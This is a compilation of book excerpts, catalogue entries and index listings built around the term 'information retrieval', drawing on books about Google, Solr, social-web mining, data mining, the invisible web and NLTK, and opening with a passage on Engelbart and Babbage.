Engelbart, however, believes that his paper failed not for lack of prototypes but because the institution of computing science at the time ‘kept trying to fit [his] ideas into the existing paradigm’, claiming that he should just ‘join their forefront problem pursuits’ and stop setting himself apart with far-flung augmentation babble (Engelbart 1988, 190). He protested that he was doing neither ‘information retrieval’ nor ‘electrical engineering’, but a new thing somewhere in between, and that it should be recognized as a new field of research. In our interview he remembered that: After I’d given a talk at Stanford, [three angry guys] got me later outside at a table. They said, ‘All you’re talking about is information retrieval.’ I said no. They said, ‘YES, it is, we’re professionals and we know, so we’re telling you don’t know enough so stay out of it, ’cause goddamit, you’re bollocksing it all up. You’re in engineering, not information retrieval.’ (Engelbart 1999) Computers, in large part, were still seen as number crunchers, and computer engineers had no business talking about psychology and the human beings who used these machines.

In making this passage, however, Engelbart also fell into a kind of failure, at least by the common understanding of an engineer’s calling in the national security state. As Engelbart told the author of this book in 1999, he was often told to mind his own business and keep off well-defined turf: After I’d given a talk at Stanford, [three angry guys] got me later outside at a table. They said, ‘All you’re talking about is information retrieval.’ I said no. They said, ‘YES, it is, we’re professionals and we know, so we’re telling you don’t know enough so stay out of it, ’cause goddamit, you’re bollocksing it all up. You’re in engineering, not information retrieval.’ (Engelbart 1999) My hero; the man who never knew too much about disciplinary confines, professional flocking rules and the mere retrieval of information; the man who straps bricks to pencils, who annoys the specialists, who insists on bollocksing up the computer world in all kinds of fascinating ways.

Gleick quotes a rather different assessment of Babbage from an early twentieth-century edition of the Dictionary of National Biography: Mathematician and scientific mechanician […] obtained government grant for making a calculating machine […] but the work of construction ceased, owing to disagreements with the engineer; offered the government an improved design, which was refused on grounds of expense […] Lucasian professor of mathematics, Cambridge, but delivered no lectures. (Cited in Gleick 2011, 121) In the words of the information retrievers, Babbage seems a resounding failure, no matter if he did (undeservedly, according to the insinuation) have Newton’s chair. Perhaps biography does not belong in dictionaries. Among other blessings that came to Babbage was one of the great friendships in intellectual history, with Augusta Ada King, Countess Lovelace. She also fell into obscurity for nearly a century after her death, but is now remembered as prodigy and prophet, the first lady of computing.


pages: 666 words: 181,495

In the Plex: How Google Thinks, Works, and Shapes Our Lives by Steven Levy

23andMe, AltaVista, Anne Wojcicki, Apple's 1984 Super Bowl advert, autonomous vehicles, book scanning, Brewster Kahle, Burning Man, business process, clean water, cloud computing, crowdsourcing, Dean Kamen, discounted cash flows, don't be evil, Donald Knuth, Douglas Engelbart, Douglas Engelbart, El Camino Real, fault tolerance, Firefox, Gerard Salton, Gerard Salton, Google bus, Google Chrome, Google Earth, Googley, HyperCard, hypertext link, IBM and the Holocaust, informal economy, information retrieval, Internet Archive, Jeff Bezos, John Markoff, Kevin Kelly, Kickstarter, Mark Zuckerberg, Menlo Park, one-China policy, optical character recognition, PageRank, Paul Buchheit, Potemkin village, prediction markets, recommendation engine, risk tolerance, Rubik’s Cube, Sand Hill Road, Saturday Night Live, search inside the book, second-price auction, selection bias, Silicon Valley, skunkworks, Skype, slashdot, social graph, social software, social web, spectrum auction, speech recognition, statistical model, Steve Ballmer, Steve Jobs, Steven Levy, Ted Nelson, telemarketer, trade route, traveling salesman, turn-by-turn navigation, undersea cable, Vannevar Bush, web application, WikiLeaks, Y Combinator

When DEC opened it to outsiders on December 15, 1995, nearly 300,000 people tried it out. They were dazzled. AltaVista’s actual search quality techniques—what determined the ranking of results—were based on traditional information retrieval (IR) algorithms. Many of those algorithms arose from the work of one man, a refugee from Nazi Germany named Gerard Salton, who had come to America, got a PhD at Harvard, and moved to Cornell University, where he cofounded its computer science department. Searching through databases using the same commands you’d use with a human—“natural language” became the term of art—was Salton’s specialty. During the 1960s, Salton developed a system that was to become a model for information retrieval. It was called SMART, supposedly an acronym for “Salton’s Magical Retriever of Text.” The system established many conventions that still persist in search, including indexing and relevance algorithms.

Fortunately, Page’s visions extended to the commercial: “Probably from when I was twelve, I knew I was going to start a company eventually,” he’d later say. Page’s brother, nine years older, was already in Silicon Valley, working for an Internet start-up. Page chose to work in the department’s Human-Computer Interaction Group. The subject would stand Page in good stead in the future with respect to product development, even though it was not in the HCI domain to figure out a new model of information retrieval. On his desk and permeating his conversations was Apple interface guru Donald Norman’s classic tome The Psychology of Everyday Things, the bible of a religion whose first, and arguably only, commandment is “The user is always right.” (Other Norman disciples, such as Jeff Bezos at Amazon.com, were adopting this creed on the web.) Another influential book was a biography of Nikola Tesla, the brilliant Serb scientist; though Tesla’s contributions arguably matched Thomas Edison’s—and his ambitions were grand enough to impress even Page—he died in obscurity.

A key designer was Louis Monier, a droll Frenchman and idealistic geek who had come to America with a doctorate in 1980. DEC had been built on the minicomputer, a once innovative category now rendered a dinosaur by the personal computer revolution. “DEC was very much living in the past,” says Monier. “But they had small groups of people who were very forward-thinking, experimenting with lots of toys.” One of those toys was the web. Monier himself was no expert in information retrieval but a big fan of data in the abstract. “To me, that was the secret—data,” he says. What the data was telling him was that if you had the right tools, it was possible to treat everything in the open web like a single document. Even at that early date, the basic building blocks of web search had been already set in stone. Search was a four-step process. First came a sweeping scan of all the world’s web pages, via a spider.


pages: 1,085 words: 219,144

Solr in Action by Trey Grainger, Timothy Potter

business intelligence, cloud computing, commoditize, conceptual framework, crowdsourcing, data acquisition, en.wikipedia.org, failed state, fault tolerance, finite state, full text search, glass ceiling, information retrieval, natural language processing, openstreetmap, performance metric, premature optimization, recommendation engine, web application

To begin, we need to know how Solr matches home listings in the index to queries entered by users, as this is the basis for all search applications. 1.2.1. Information retrieval engine Solr is built on Apache Lucene, a popular, Java-based, open source, information retrieval library. We’ll save a detailed discussion of what information retrieval is for chapter 3. For now, we’ll touch on the key concepts behind information retrieval, starting with the formal definition taken from one of the prominent academic texts on modern search concepts: Information retrieval (IR) is finding material (usually documents) of an unstructured nature (usually text) that satisfies an information need from within large collections (usually stored on computers).[1] 1 Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze, Introduction to Information Retrieval (Cambridge University Press, 2008). In our example real estate application, the user’s primary need is finding a home to purchase based on location, home style, features, and price.

The key data structure supporting information retrieval is the inverted index. You’ll learn all about how an inverted index works in chapter 3. For now, it’s sufficient to review figure 1.2 to get a feel for what happens when a new document (#44 in the diagram) is added to the index and how documents are matched to query terms using the inverted index. You might be thinking that a relational database could easily return the same results using an SQL query, which is true for this simple example. But one key difference between a Lucene query and a database query is that in Lucene results are ranked by their relevance to a query, and database results can only be sorted by one or more of the table columns. In other words, ranking documents by relevance is a key aspect of information retrieval and helps differentiate it from other types of queries.

IBSimilarity class ICUFoldingFilterFactory idf (inverse document frequency), 2nd, 3rd, 4th if function implicit routing importing documents common formats DIH ExtractingRequestHandler Nutch relational database data using JSON using SolrJ library using XML Inactive state incremental indexing indent parameter indexlog utility IndicNormalizationFilterFactory Indonesian language IndonesianStemFilterFactory information discovery use case information retrieval. See IR. installing Solr instanceDir parameter <int> element Integrated Development Environment. See IDE. IntelliJ IDEA internationalization. See multilingual search. Intersects operation invalidating cached objects invariants section inverse document frequency. See idf. inverted index ordering of terms overview IR (information retrieval) Irish language IrishLowerCaseFilterFactory, 2nd IsDisjointTo operation IsWithin operation Italian language ItalianLightStemFilterFactory J J2EE (Java 2 Platform, Enterprise Edition) Japanese language, 2nd JapaneseBaseFormFilterFactory JapaneseKatakanaStemFilterFactory JapaneseTokenizerFactory JAR files Java 2 Platform, Enterprise Edition.


pages: 541 words: 109,698

Mining the Social Web: Finding Needles in the Social Haystack by Matthew A. Russell

Climategate, cloud computing, crowdsourcing, en.wikipedia.org, fault tolerance, Firefox, full text search, Georg Cantor, Google Earth, information retrieval, Mark Zuckerberg, natural language processing, NP-complete, Saturday Night Live, semantic web, Silicon Valley, slashdot, social graph, social web, statistical model, Steve Jobs, supply-chain management, text mining, traveling salesman, Turing test, web application

Text Mining Fundamentals Although rigorous approaches to natural language processing (NLP) that include such things as sentence segmentation, tokenization, word chunking, and entity detection are necessary in order to achieve the deepest possible understanding of textual data, it’s helpful to first introduce some fundamentals from Information Retrieval theory. The remainder of this chapter introduces some of its more foundational aspects, including TF-IDF, the cosine similarity metric, and some of the theory behind collocation detection. Chapter 8 provides a deeper discussion of NLP. Note If you want to dig deeper into IR theory, the full text of Introduction to Information Retrieval is available online and provides more information than you could ever want to know about the field. A Whiz-Bang Introduction to TF-IDF Information retrieval is an extensive field with many specialties. This discussion narrows in on TF-IDF, one of the most fundamental techniques for retrieving relevant documents from a corpus.

I identity consolidation, Brief analysis of breadth-first techniques IDF (inverse document frequency), A Whiz-Bang Introduction to TF-IDF, A Whiz-Bang Introduction to TF-IDF (see also TF-IDF) calculation of, A Whiz-Bang Introduction to TF-IDF idf function, A Whiz-Bang Introduction to TF-IDF IETF OAuth 2.0 protocol, No, You Can’t Have My Password IMAP (Internet Message Access Protocol), Analyzing Your Own Mail Data, Accessing Gmail with OAuth, Fetching and Parsing Email Messages connecting to, using OAuth, Accessing Gmail with OAuth constructing an IMAP query, Fetching and Parsing Email Messages imaplib, Fetching and Parsing Email Messages ImportError, Installing Python Development Tools indexing function, JavaScript-based, couchdb-lucene: Full-Text Indexing and More inference, Open-World Versus Closed-World Assumptions, Inferencing About an Open World with FuXi application to machine knowledge, Inferencing About an Open World with FuXi in logic-based programming languages and RDF, Open-World Versus Closed-World Assumptions influence, measuring for Twitter users, Measuring Influence, Measuring Influence, Measuring Influence, Measuring Influence calculating Twitterer’s most popular followers, Measuring Influence crawling friends/followers connections, Measuring Influence Infochimps, Strong Links API, The Infochimps “Strong Links” API, Interactive 3D Graph Visualization information retrieval industry, Before You Go Off and Try to Build a Search Engine… information retrieval theory, Text Mining Fundamentals (see IR theory) intelligent clustering, Intelligent clustering enables compelling user experiences interactive 3D graph visualization, Interactive 3D Graph Visualization interactive 3D tag clouds for tweet entities co-occurring with #JustinBieber and #TeaParty, Visualizing Tweets with Tricked-Out Tag Clouds interpreter, Python (IPython), Closing Remarks intersection operations, Elementary Set Operations, How Much Overlap Exists Between the Entities of #TeaParty and #JustinBieber Tweets?

For comparative purposes, note that it’s certainly possible to perform text-based indexing by writing a simple mapping function that associates keywords and documents, like the one in Example 3-10. Example 3-10. A mapper that tokenizes documents def tokenizingMapper(doc): tokens = doc.split() for token in tokens: if isInteresting(token): # Filter out stop words, etc. yield token, doc However, you’ll quickly find that you need to do a lot more homework about basic Information Retrieval (IR) concepts if you want to establish a good scoring function to rank documents by relevance or anything beyond basic frequency analysis. Fortunately, the benefits of Lucene are many, and chances are good that you’ll want to use couchdb-lucene instead of writing your own mapping function for full-text indexing. Note Unlike the previous sections that opted to use the couchdb module, this section uses httplib to exercise CouchDB’s REST API directly and includes view functions written in JavaScript.


pages: 721 words: 197,134

Data Mining: Concepts, Models, Methods, and Algorithms by Mehmed Kantardzić

Albert Einstein, bioinformatics, business cycle, business intelligence, business process, butter production in bangladesh, combinatorial explosion, computer vision, conceptual framework, correlation coefficient, correlation does not imply causation, data acquisition, discrete time, El Camino Real, fault tolerance, finite state, Gini coefficient, information retrieval, Internet Archive, inventory management, iterative process, knowledge worker, linked data, loose coupling, Menlo Park, natural language processing, Netflix Prize, NP-complete, PageRank, pattern recognition, peer-to-peer, phenotype, random walk, RFID, semantic web, speech recognition, statistical model, Telecommunications Act of 1996, telemarketer, text mining, traveling salesman, web application

The paper presents the taxonomy of clustering techniques and identifies crosscutting themes, recent advances, and some important applications. For readers interested in practical implementation of some clustering methods, the paper offers useful advice and a large spectrum of references. Miyamoto, S., Fuzzy Sets in Information Retrieval and Cluster Analysis, Cluver Academic Publishers, Dodrecht, Germany, 1990. This book offers an in-depth presentation and analysis of some clustering algorithms and reviews the possibilities of combining these techniques with fuzzy representation of data. Information retrieval, which, with the development of advanced Web-mining techniques, is becoming more important in the data-mining community, is also explained in the book. 10 ASSOCIATION RULES Chapter Objectives Explain the local modeling character of association-rule techniques.

Any researcher or practitioner in this field needs to be aware of these issues in order to successfully apply a particular methodology, to understand a method’s limitations, or to develop new techniques. This book is an attempt to present and discuss such issues and principles and then describe representative and popular methods originating from statistics, machine learning, computer graphics, data bases, information retrieval, neural networks, fuzzy logic, and evolutionary computation. In this book, we describe how best to prepare environments for performing data mining and discuss approaches that have proven to be critical in revealing important patterns, trends, and models in large data sets. It is our expectation that once a reader has completed this text, he or she will be able to initiate and perform basic activities in all phases of a data mining process successfully and effectively.

This, in general, requires computing the distance of the unlabeled object to all the objects in the labeled set, which can be expensive particularly for large training sets. Among the various methods of supervised learning, the nearest neighbor classifier achieves consistently high performance, without a priori assumptions about the distributions from which the training examples are drawn. The reader may have noticed the similarity between the problem of finding nearest neighbors for a test sample and ad hoc retrieval methodologies. In standard information retrieval systems such as digital libraries or web search, we search for the documents (samples) with the highest similarity to the query document represented by a set of key words. Problems are similar, and often the proposed solutions are applicable in both disciplines. Decision boundaries in 1NN are concatenated segments of the Voronoi diagram as shown in Figure 4.28. The Voronoi diagram decomposes space into Voronoi cells, where each cell consists of all points that are closer to the sample than to other samples.


pages: 481 words: 121,669

The Invisible Web: Uncovering Information Sources Search Engines Can't See by Gary Price, Chris Sherman, Danny Sullivan

AltaVista, American Society of Civil Engineers: Report Card, bioinformatics, Brewster Kahle, business intelligence, dark matter, Donald Davies, Douglas Engelbart, Douglas Engelbart, full text search, HyperCard, hypertext link, information retrieval, Internet Archive, joint-stock company, knowledge worker, natural language processing, pre–internet, profit motive, publish or perish, search engine result page, side project, Silicon Valley, speech recognition, stealth mode startup, Ted Nelson, Vannevar Bush, web application

Despite this increased accessibility, the Internet was still primarily a tool for academics and government contractors well into the early 1990s. As more and more computers connected to the Internet, users began to demand tools that would allow them to search for and locate text and other files on computers anywhere on the Net. Early Net Search Tools Although sophisticated search and information retrieval techniques date back to the late 1950s and early ‘60s, these techniques were used primarily in closed or proprietary systems. Early Internet search and retrieval tools lacked even the most basic capabilities, primarily because it was thought that traditional information retrieval techniques would not work well on an open, unstructured information universe like the Internet. Accessing a file on the Internet was a two-part process. First, you needed to establish direct connection to the remote computer where the file was located using a terminal emulation program called Telnet.

But they relied on Web page authors to submit information, and the Web’s relentless growth rate ultimately made it impossible to keep the lists either current or comprehensive. What was needed was an automated approach to Web page discovery and indexing. The Web had now grown large enough that information scientists became interested in creating search services specifically for the Web. Sophisticated information retrieval techniques had been available since the early 1960s, but they were only effective when searching closed, relatively structured databases. The open, laissez-faire nature of the Web made it too messy to easily adapt traditional information retrieval techniques. New, Web-centric approaches were needed. But how best to approach the problem? Web search would clearly have to be more sophisticated than a simple Archie-type service. But should these new “search engines” attempt to index the full text of Web documents, much as earlier Gopher tools had done, or simply broker requests to local Web search services on individual computers, following the WAIS model?

The First Search Engines Tim Berners-Lee’s vision of the Web was of an information space where data of all types could be freely accessed. But in the early days of the Web, the reality was that most of the Web consisted of simple HTML text documents. Since few servers offered local site search services, developers of the first Web search engines opted for the model of indexing the full text of pages stored on Web servers. To adapt traditional information retrieval techniques to Web search, they built huge databases that attempted to replicate the Web, searching over these relatively controlled, closed archives of pages rather than trying to search the Web itself in real time. With this fateful architectural decision, limiting search engines to HTML text documents and essentially ignoring all other types of data available via the Web, the Invisible Web was born.


pages: 504 words: 89,238

Natural language processing with Python by Steven Bird, Ewan Klein, Edward Loper

bioinformatics, business intelligence, conceptual framework, Donald Knuth, elephant in my pajamas, en.wikipedia.org, finite state, Firefox, Guido van Rossum, information retrieval, Menlo Park, natural language processing, P = NP, search inside the book, speech recognition, statistical model, text mining, Turing test

This can be broken down into two subtasks: identifying the boundaries of the NE, and identifying its type. While named entity recognition is frequently a prelude to identifying relations in Information Extraction, it can also contribute to other tasks. For example, in Question Answering (QA), we try to improve the precision of Information Retrieval by recovering not whole pages, but just those parts which contain an answer to the user’s question. Most QA systems take the 7.5 Named Entity Recognition | 281 documents returned by standard Information Retrieval, and then attempt to isolate the minimal text snippet in the document containing the answer. Now suppose the question was Who was the first President of the US?, and one of the documents that was retrieved contained the following passage: (5) The Washington Monument is the most prominent structure in Washington, D.C. and one of the city’s early attractions.

English, 63 code blocks, nested, 25 code examples, downloading, 57 code points, 94 codecs module, 95 coindex (in feature structure), 340 collocations, 20, 81 comma operator (,), 133 comparative wordlists, 65 comparison operators numerical, 22 for words, 23 complements of lexical head, 347 complements of verbs, 313 complex types, 373 complex values, 336 components, language understanding, 31 computational linguistics, challenges of natural language, 441 computer understanding of sentence meaning, 368 concatenation, 11, 88 lists and strings, 87 strings, 16 conclusions in logic, 369 concordances creating, 40 graphical POS-concordance tool, 184 conditional classifiers, 254 conditional expressions, 25 conditional frequency distributions, 44, 52–56 combining with regular expressions, 103 condition and event pairs, 52 counting words by genre, 52 generating random text with bigrams, 55 male and female names ending in each alphabet letter, 62 plotting and tabulating distributions, 53 using to find minimally contrasting set of words, 64 ConditionalFreqDist, 52 commonly used methods, 56 conditionals, 22, 133 confusion matrix, 207, 240 consecutive classification, 232 non phrase chunking with consecutive classifier, 275 consistent, 366 466 | General Index constituent structure, 296 constituents, 297 context exploiting in part-of-speech classifier, 230 for taggers, 203 context-free grammar, 298, 300 (see also grammars) probabilistic context-free grammar, 320 contractions in tokenization, 112 control, 22 control structures, 26 conversion specifiers, 118 conversions of data formats, 419 coordinate structures, 295 coreferential, 373 corpora, 39–52 annotated text corpora, 46–48 Brown Corpus, 42–44 creating and accessing, resources for further reading, 438 defined, 39 differences in corpus access methods, 50 exploring text corpora using a chunker, 267 Gutenberg Corpus, 39–42 Inaugural Address Corpus, 45 from languages other than English, 48 loading your own corpus, 51 obtaining from Web, 416 Reuters Corpus, 44 sources of, 73 tagged, 181–189 text corpus structure, 49–51 web and chat text, 42 wordlists, 60–63 corpora, included with NLTK, 46 corpus case study, structure of TIMIT, 407–412 corpus HOWTOs, 122 life cycle of, 412–416 creation scenarios, 412 curation versus evolution, 415 quality control, 413 widely-used format for, 421 counters, legitimate uses of, 141 cross-validation, 241 CSV (comma-separated value) format, 418 CSV (comma-separated-value) format, 170 D \d decimal digits in regular expressions, 110 \D nondigit characters in regular expressions, 111 data formats, converting, 419 data types dictionary, 190 documentation for Python standard types, 173 finding type of Python objects, 86 function parameter, 146 operations on objects, 86 database query via natural language, 361–365 databases, obtaining data from, 418 debugger (Python), 158 debugging techniques, 158 decimal integers, formatting, 119 decision nodes, 242 decision stumps, 243 decision trees, 242–245 entropy and information gain, 243 decision-tree classifier, 229 declarative style, 140 decoding, 94 def keyword, 9 defaultdict, 193 defensive programming, 159 demonstratives, agreement with noun, 329 dependencies, 310 criteria for, 312 existential dependencies, modeling in XML, 427 non-projective, 312 projective, 311 unbounded dependency constructions, 349–353 dependency grammars, 310–315 valency and the lexicon, 312 dependents, 310 descriptive models, 255 determiners, 186 agreement with nouns, 333 deve-test set, 225 development set, 225 similarity to test set, 238 dialogue act tagging, 214 dialogue acts, identifying types, 235 dialogue systems (see spoken dialogue systems) dictionaries feature set, 223 feature structures as, 337 pronouncing dictionary, 63–65 Python, 189–198 default, 193 defining, 193 dictionary data type, 190 finding key given a value, 197 indexing lists versus, 189 summary of dictionary methods, 197 updating incrementally, 195 storing features and values, 327 translation, 66 dictionary methods, 197 dictionary data structure (Python), 65 directed acyclic graphs (DAGs), 338 discourse module, 401 discourse semantics, 397–402 discourse processing, 400–402 discourse referents, 397 discourse representation structure (DRS), 397 Discourse Representation Theory (DRT), 397–400 dispersion plot, 6 divide-and-conquer strategy, 160 docstrings, 143 contents and structure of, 148 example of complete docstring, 148 module-level, 155 doctest block, 148 doctest module, 160 document classification, 227 documentation functions, 148 online Python documentation, versions and, 173 Python, resources for further information, 173 docutils module, 148 domain (of a model), 377 DRS (discourse representation structure), 397 DRS conditions, 397 DRT (Discourse Representation Theory), 397– 400 Dublin Core Metadata initiative, 435 duck typing, 281 dynamic programming, 165 General Index | 467 application to parsing with context-free grammar, 307 different approaches to, 167 E Earley chart parser, 334 electronic books, 80 elements, XML, 425 ElementTree interface, 427–429 using to access Toolbox data, 429 elif clause, if . . . elif statement, 133 elif statements, 26 else statements, 26 encoding, 94 encoding features, 223 encoding parameters, codecs module, 95 endangered languages, special considerations with, 423–424 entities, 373 entity detection, using chunking, 264–270 entries adding field to, in Toolbox, 431 contents of, 60 converting data formats, 419 formatting in XML, 430 entropy, 251 (see also Maximum Entropy classifiers) calculating for gender prediction task, 243 maximizing in Maximum Entropy classifier, 252 epytext markup language, 148 equality, 132, 372 equivalence (<->) operator, 368 equivalent, 340 error analysis, 225 errors runtime, 13 sources of, 156 syntax, 3 evaluation sets, 238 events, pairing with conditions in conditional frequency distribution, 52 exceptions, 158 existential quantifier, 374 exists operator, 376 Expected Likelihood Estimation, 249 exporting data, 117 468 | General Index F f-structure, 357 feature extractors defining for dialogue acts, 235 defining for document classification, 228 defining for noun phrase (NP) chunker, 276–278 defining for punctuation, 234 defining for suffix checking, 229 Recognizing Textual Entailment (RTE), 236 selecting relevant features, 224–227 feature paths, 339 feature sets, 223 feature structures, 328 order of features, 337 resources for further reading, 357 feature-based grammars, 327–360 auxiliary verbs and inversion, 348 case and gender in German, 353 example grammar, 333 extending, 344–356 lexical heads, 347 parsing using Earley chart parser, 334 processing feature structures, 337–344 subsumption and unification, 341–344 resources for further reading, 357 subcategorization, 344–347 syntactic agreement, 329–331 terminology, 336 translating from English to SQL, 362 unbounded dependency constructions, 349–353 using attributes and constraints, 331–336 features, 223 non-binary features in naive Bayes classifier, 249 fields, 136 file formats, libraries for, 172 files opening and reading local files, 84 writing program output to, 120 fillers, 349 first-order logic, 372–385 individual variables and assignments, 378 model building, 383 quantifier scope ambiguity, 381 summary of language, 376 syntax, 372–375 theorem proving, 375 truth in model, 377 floating-point numbers, formatting, 119 folds, 241 for statements, 26 combining with if statements, 26 inside a list comprehension, 63 iterating over characters in strings, 90 format strings, 118 formatting program output, 116–121 converting from lists to strings, 116 strings and formats, 117–118 text wrapping, 120 writing results to file, 120 formulas of propositional logic, 368 formulas, type (t), 373 free, 375 Frege’s Principle, 385 frequency distributions, 17, 22 conditional (see conditional frequency distributions) functions defined for, 22 letters, occurrence in strings, 90 functions, 142–154 abstraction provided by, 147 accumulative, 150 as arguments to another function, 149 call-by-value parameter passing, 144 checking parameter types, 146 defined, 9, 57 documentation for Python built-in functions, 173 documenting, 148 errors from, 157 for frequency distributions, 22 for iteration over sequences, 134 generating plurals of nouns (example), 58 higher-order, 151 inputs and outputs, 143 named arguments, 152 naming, 142 poorly-designed, 147 recursive, call structure, 165 saving in modules, 59 variable scope, 145 well-designed, 147 gazetteer, 282 gender identification, 222 Decision Tree model for, 242 gender in German, 353–356 Generalized Phrase Structure Grammar (GPSG), 345 generate_model ( ) function, 55 generation of language output, 29 generative classifiers, 254 generator expressions, 138 functions exemplifying, 151 genres, systematic differences between, 42–44 German, case and gender in, 353–356 gerunds, 211 glyphs, 94 gold standard, 201 government-sponsored challenges to machine learning application in NLP, 257 gradient (grammaticality), 318 grammars, 327 (see also feature-based grammars) chunk grammar, 265 context-free, 298–302 parsing with, 302–310 validating Toolbox entries with, 433 writing your own, 300 dependency, 310–315 development, 315–321 problems with ambiguity, 317 treebanks and grammars, 315–317 weighted grammar, 318–321 dilemmas in sentence structure analysis, 292–295 resources for further reading, 322 scaling up, 315 grammatical category, 328 graphical displays of data conditional frequency distributions, 56 Matplotlib, 168–170 graphs defining and manipulating, 170 directed acyclic graphs, 338 greedy sequence classification, 232 Gutenberg Corpus, 40–42, 80 G hapaxes, 19 hash arrays, 189, 190 (see also dictionaries) gaps, 349 H General Index | 469 head of a sentence, 310 criteria for head and dependencies, 312 heads, lexical, 347 headword (lemma), 60 Heldout Estimation, 249 hexadecimal notation for Unicode string literal, 95 Hidden Markov Models, 233 higher-order functions, 151 holonyms, 70 homonyms, 60 HTML documents, 82 HTML markup, stripping out, 418 hypernyms, 70 searching corpora for, 106 semantic similarity and, 72 hyphens in tokenization, 110 hyponyms, 69 I identifiers for variables, 15 idioms, Python, 24 IDLE (Interactive DeveLopment Environment), 2 if . . . elif statements, 133 if statements, 25 combining with for statements, 26 conditions in, 133 immediate constituents, 297 immutable, 93 implication (->) operator, 368 in operator, 91 Inaugural Address Corpus, 45 inconsistent, 366 indenting code, 138 independence assumption, 248 naivete of, 249 indexes counting from zero (0), 12 list, 12–14 mapping dictionary definition to lexeme, 419 speeding up program by using, 163 string, 15, 89, 91 text index created using a stemmer, 107 words containing a given consonant-vowel pair, 103 inference, 369 information extraction, 261–289 470 | General Index architecture of system, 263 chunking, 264–270 defined, 262 developing and evaluating chunkers, 270– 278 named entity recognition, 281–284 recursion in linguistic structure, 278–281 relation extraction, 284 resources for further reading, 286 information gain, 243 inside, outside, begin tags (see IOB tags) integer ordinal, finding for character, 95 interpreter >>> prompt, 2 accessing, 2 using text editor instead of to write programs, 56 inverted clauses, 348 IOB tags, 269, 286 reading, 270–272 is operator, 145 testing for object identity, 132 ISO 639 language codes, 65 iterative optimization techniques, 251 J joint classifier models, 231 joint-features (maximum entropy model), 252 K Kappa coefficient (k), 414 keys, 65, 191 complex, 196 keyword arguments, 153 Kleene closures, 100 L lambda expressions, 150, 386–390 example, 152 lambda operator (λ), 386 Lancaster stemmer, 107 language codes, 65 language output, generating, 29 language processing, symbol processing versus, 442 language resources describing using OLAC metadata, 435–437 LanguageLog (linguistics blog), 35 latent semantic analysis, 171 Latin-2 character encoding, 94 leaf nodes, 242 left-corner parser, 306 left-recursive, 302 lemmas, 60 lexical relationships between, 71 pairing of synset with a word, 68 lemmatization, 107 example of, 108 length of a text, 7 letter trie, 162 lexical categories, 179 lexical entry, 60 lexical relations, 70 lexical resources comparative wordlists, 65 pronouncing dictionary, 63–65 Shoebox and Toolbox lexicons, 66 wordlist corpora, 60–63 lexicon, 60 (see also lexical resources) chunking Toolbox lexicon, 434 defined, 60 validating in Toolbox, 432–435 LGB rule of name resolution, 145 licensed, 350 likelihood ratios, 224 Linear-Chain Conditional Random Field Models, 233 linguistic objects, mappings from keys to values, 190 linguistic patterns, modeling, 255 linguistics and NLP-related concepts, resources for, 34 list comprehensions, 24 for statement in, 63 function invoked in, 64 used as function parameters, 55 lists, 10 appending item to, 11 concatenating, using + operator, 11 converting to strings, 116 indexing, 12–14 indexing, dictionaries versus, 189 normalizing and sorting, 86 Python list type, 86 sorted, 14 strings versus, 92 tuples versus, 136 local variables, 58 logic first-order, 372–385 natural language, semantics, and, 365–368 propositional, 368–371 resources for further reading, 404 logical constants, 372 logical form, 368 logical proofs, 370 loops, 26 looping with conditions, 26 lowercase, converting text to, 45, 107 M machine learning application to NLP, web pages for government challenges, 257 decision trees, 242–245 Maximum Entropy classifiers, 251–254 naive Bayes classifiers, 246–250 packages, 237 resources for further reading, 257 supervised classification, 221–237 machine translation (MT) limitations of, 30 using NLTK’s babelizer, 30 mapping, 189 Matplotlib package, 168–170 maximal projection, 347 Maximum Entropy classifiers, 251–254 Maximum Entropy Markov Models, 233 Maximum Entropy principle, 253 memoization, 167 meronyms, 70 metadata, 435 OLAC (Open Language Archives Community), 435 modals, 186 model building, 383 model checking, 379 models interpretation of sentences of logical language, 371 of linguistic patterns, 255 representation using set theory, 367 truth-conditional semantics in first-order logic, 377 General Index | 471 what can be learned from models of language, 255 modifiers, 314 modules defined, 59 multimodule programs, 156 structure of Python module, 154 morphological analysis, 213 morphological cues to word category, 211 morphological tagging, 214 morphosyntactic information in tagsets, 212 MSWord, text from, 85 mutable, 93 N \n newline character in regular expressions, 111 n-gram tagging, 203–208 across sentence boundaries, 208 combining taggers, 205 n-gram tagger as generalization of unigram tagger, 203 performance limitations, 206 separating training and test data, 203 storing taggers, 206 unigram tagging, 203 unknown words, 206 naive Bayes assumption, 248 naive Bayes classifier, 246–250 developing for gender identification task, 223 double-counting problem, 250 as generative classifier, 254 naivete of independence assumption, 249 non-binary features, 249 underlying probabilistic model, 248 zero counts and smoothing, 248 name resolution, LGB rule for, 145 named arguments, 152 named entities commonly used types of, 281 relations between, 284 named entity recognition (NER), 281–284 Names Corpus, 61 negative lookahead assertion, 284 NER (see named entity recognition) nested code blocks, 25 NetworkX package, 170 new words in languages, 212 472 | General Index newlines, 84 matching in regular expressions, 109 printing with print statement, 90 resources for further information, 122 non-logical constants, 372 non-standard words, 108 normalizing text, 107–108 lemmatization, 108 using stemmers, 107 noun phrase (NP), 297 noun phrase (NP) chunking, 264 regular expression–based NP chunker, 267 using unigram tagger, 272 noun phrases, quantified, 390 nouns categorizing and tagging, 184 program to find most frequent noun tags, 187 syntactic agreement, 329 numerically intense algorithms in Python, increasing efficiency of, 257 NumPy package, 171 O object references, 130 copying, 132 objective function, 114 objects, finding data type for, 86 OLAC metadata, 74, 435 definition of metadata, 435 Open Language Archives Community, 435 Open Archives Initiative (OAI), 435 open class, 212 open formula, 374 Open Language Archives Community (OLAC), 435 operators, 369 (see also names of individual operators) addition and multiplication, 88 Boolean, 368 numerical comparison, 22 scope of, 157 word comparison, 23 or operator, 24 orthography, 328 out-of-vocabulary items, 206 overfitting, 225, 245 P packages, 59 parameters, 57 call-by-value parameter passing, 144 checking types of, 146 defined, 9 defining for functions, 143 parent nodes, 279 parsing, 318 (see also grammars) with context-free grammar left-corner parser, 306 recursive descent parsing, 303 shift-reduce parsing, 304 well-formed substring tables, 307–310 Earley chart parser, parsing feature-based grammars, 334 parsers, 302 projective dependency parser, 311 part-of-speech tagging (see POS tagging) partial information, 341 parts of speech, 179 PDF text, 85 Penn Treebank Corpus, 51, 315 personal pronouns, 186 philosophical divides in contemporary NLP, 444 phonetics computer-readable phonetic alphabet (SAMPA), 137 phones, 63 resources for further information, 74 phrasal level, 347 phrasal projections, 347 pipeline for NLP, 31 pixel images, 169 plotting functions, Matplotlib, 168 Porter stemmer, 107 POS (part-of-speech) tagging, 179, 208, 229 (see also tagging) differences in POS tagsets, 213 examining word context, 230 finding IOB chunk tag for word's POS tag, 272 in information retrieval, 263 morphology in POS tagsets, 212 resources for further reading, 214 